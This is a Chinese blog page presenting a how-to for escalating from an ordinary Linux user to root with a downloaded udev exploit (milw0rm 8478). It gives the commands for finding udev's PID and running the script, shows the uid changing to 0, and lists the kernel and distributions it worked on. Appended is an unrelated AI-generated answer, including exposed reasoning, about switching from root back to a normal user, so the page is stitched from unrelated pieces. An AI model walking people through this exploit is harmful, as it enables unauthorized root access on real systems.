LINUX 普通用户提权ROOT (完整版)SHELL版首发!!!

本文介绍了一种在Linux系统中从普通用户提升到root权限的方法,包括创建test账户、下载并使用特定脚本来获取UDEV的PID,最终实现权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. 在LINUX目录下建立test 帐户
2.下载 a脚本 在http://milw0rm.com/exploits/8478
3.查看UDEV的PID  方法一: 先cat /proc/net/netlink
ffff810077587400 15  364    ffffffff 0        0        0000000000000000 2
ffff810037f81000 16  0      00000000 0        0        0000000000000000 2
ffff810077078400 18  0      00000000 0        0        0000000000000000 2
那个364就是 UDEV的进程,如果出现很多不知道哪一个用方法2
方法二:
另外最好通过ps aux | grep udev获取pid 为365,然后再-1,把这个参数传给A脚本
然后在test 用户的当前目录 里
按以下步骤运行
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$sh a 364
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
此时的UID 变为0了 ,test用户已经变为 ROOT用户 可以继续以下
sh-3.1# bash
[root@localhost ~]#
看!test -> ROOT 用户大变身!!

说说我的测试版本[root@localhost ~]# uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:14 EST 2007 x86_64 x86_64 x86_64 GNU/Linux

目前RH5 和UBANTU 以及DABIAN都测试通过了 但是TURBOLINUX上没有测试通过..

<think>我们正在处理用户的问题:如何从root用户切换回普通用户?根据引用内容,我们注意到引用[1]到了一些关于su和sudo命令的信息,特别是:-默认情况下,某些Linux发行(如Ubuntu)禁用了root账户,但可以通过`sudosu-`切换到root。-su命令允许切换当前用户到任何其他用户。如果要切换到非root用户,可以使用`su-[username]`。因此,从root切换回普通用户有两种常见方式:1.使用`su-[普通用户名]`命令,例如:`su-alice`2.使用`exit`命令,因为当你使用`su`或`sudo`成为root时,实际上是启动了一个新的shell,退出这个shell就会回到之前的用户。另外,如果当前是以root用户登录(比如通过root密码直接登录),那么使用`exit`会退出登录,而使用`su-username`可以切换到指定用户。所以,我们可以这样回答:在Linux系统中,从root用户切换回普通用户有以下方法:-方法1:使用`su-普通用户名`命令,例如:`su-john`(其中john是普通用户名)-方法2:使用`exit`命令,退出当前的rootshell,回到切换前的用户(如果之前是从普通用户切换到root的,则回到那个普通用户)。注意:如果当前是直接以root用户登录到系统(而不是通过su或sudo临时切换),那么使用`exit`会关闭当前终端或结束登录会话。在这种情况下,建议使用`su`切换到普通用户。另外,还可以使用`sudo-i-u普通用户名`(但通常root用户不需要sudo,因为已经是超级用户了,所以直接使用su即可)。根据引用[1]中的信息,我们还可以补充:使用`su-`命令时,`-`(或`-l`)选项会模拟一个完整的登录环境,包括环境变量等。因此,我们推荐使用`su-用户名`来切换。生成相关问题:1.如何从普通用户切换到root用户?2.在Linux中,sudo和su命令有什么区别?3.如何创建一个新的普通用户?注意:引用[1]中到了sudosu-,以及su命令的用法,我们据此回答。</think>### 从 root 用户切换回普通用户的方法 在 Linux 系统中,从 root 用户切换回普通用户主要有以下两种方法: #### 方法 1:使用 `su - [用户名]` 命令 ```bash su - normal_user ``` - **说明**: 直接切换到指定普通用户(如 `normal_user`),`-` 选项会加载目标用户的环境变量和配置文件[^1]。 - **示例**: ```bash root@server:~# su - alice # 切换到用户 alice alice@server:~$ # 示符变化表示切换成功 ``` #### 方法 2:使用 `exit` 命令 ```bash exit ``` - **说明**: 退出当前 root shell 会话,**返回到切换前的普通用户**(仅适用于通过 `su` 或 `sudo` 临时限的场景)[^1]。 - **示例**: ```bash user@server:~$ sudo su - # 先切换到 root root@server:~# exit # 退出 root 会话 user@server:~$ # 返回原普通用户 ``` --- ### 注意事项 1. **限验证**: 从 root 切换到普通用户**不需要密码**(root 拥有最高限)。 2. **环境差异**: 使用 `su [用户名]`(不带 `-`)会保留 root 的环境变量;使用 `su - [用户名]` 会完全模拟目标用户的登录环境[^1]。 3. **直接登录场景**: 如果系统是**直接以 root 身份登录**的(非临时切换),`exit` 会直接关闭终端或结束会话。 --- ### 操作示例流程 ```bash # 当前为普通用户 user user@server:~$ sudo su - # 输入 user 的密码切换到 root root@server:~# # 方法1:切换到另一个普通用户 alice root@server:~# su - alice alice@server:~$ # 方法2:退回原用户 user alice@server:~$ exit # 退出 alice 的会话 root@server:~# exit # 退出 root 会话 user@server:~$ # 回到初始用户 ```
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值